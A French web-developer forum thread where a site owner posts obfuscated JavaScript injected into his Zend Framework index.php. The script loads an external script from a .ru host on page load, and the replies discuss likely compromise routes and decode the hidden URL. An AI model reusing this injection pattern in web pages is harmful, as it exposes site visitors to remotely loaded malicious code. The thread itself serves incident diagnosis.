Discussion :

[__fabrice]

Hello à tous,

Je développe un site avec ZF 1.9, et il y a eu un soucis sur le fichier index.php, du code a été ajouté je ne sais pas qui !!, voici :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
<script>/*GNU GPL*/ try{window.onload = function(){
var Nhbk5v835x5dq6 = document.createElement('script');
Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');
Nhbk5v835x5dq6.setAttribute('id', 'myscript1');
Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));
Nhbk5v835x5dq6.setAttribute('defer', 'defer');
document.body.appendChild(Nhbk5v835x5dq6);}}
catch(e) {}</script>

çà sent tres mauvais ce code là ... une idée sur ce problème ?
Merci
Fabrice

[sabotage]

Si le fichier est modifié, il y a de fortes chances qu'un virus soit présent sur ton serveur.

[__fabrice]

Oui, le fichier a été modifié, et ce code n'est pas sur mon serveur mais chez un hébergeur privé (Linux).... Dois je en changer ?

Fabrice

[sabotage]

Le virus peut techniquement venir de plein de choses : une faille de sécurité sur le serveur en est une, on pourrait aussi imaginer un virus sur ton logiciel FTP par exemple.

[__fabrice]

Je ne crois pas, j'ai un anti-virus + firewall mise à jour quotidiennement, et c'est un fichier en dehors du repository, que j'exporte par la suite (pas ce fichier).

Et l'erreur est apparue sans que j'intervienne.

Fabrice

[grunk]

Plutôt qu'un virus , je pencherais plus pour un deface de ton site afin de récupérer les infos de tes visiteurs.
Plusieurs cause possible :

- Un acces ftp bateau genre toto/toto
- Une faille quelconque sur ton site permettant à un pirate d'uploader un fichier et de l'executer
- Une sécurité insuffisante sur ton pc , keylogger , libre accès à ta machine ...

Un virus c'est quand même fort peu probable. D'une part un virus qui transiterais de windows à linux via un client ftp ca serait du jamais vu. Et d'autre part les virus ne vise généralement pas particumlièrement les pages web.

Dans tous les cas tu es bon pour un check compelt de ton site, des logs si tu y a accès et de la config de ton serveur si tu es sur un serveur dédié.

[matdevdev]

je viens de connaitre le même problème :
modification, via ftp je suppose, des fichiers contenant le mot index.
J'ai l'impression que le procédure a lieu quand je suis connecté en FTP sur le site sur lequel je bosse. Perso, j'utilise dream CSS4 comme client FTP.
je pense que le script ajouté permet de récupérer l'url du site (l'accès FTP seul ne donnant pas l'information) et qu'ensuite d'autre appli sont installé.

dans le script pour le paramètre src, en supprimant tous les caractères spéciaux on obtient une url :
.....msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

[__fabrice]

Hello,

Merci pour ces infos. Ce site ne me dis rien, surtout avec un .ru à la fin
Ma foi, je vais vérifier tout çà... et voir si çà se reproduit.

Fab

[Invité]

Bonjour,
Ce serait interessant que tu donnes même par MP si tu veux, l(URL de ton site, que ceux qui ont des techniques dans ce domaine aillent titiller la bête.

Cela ne peut qu'étre util !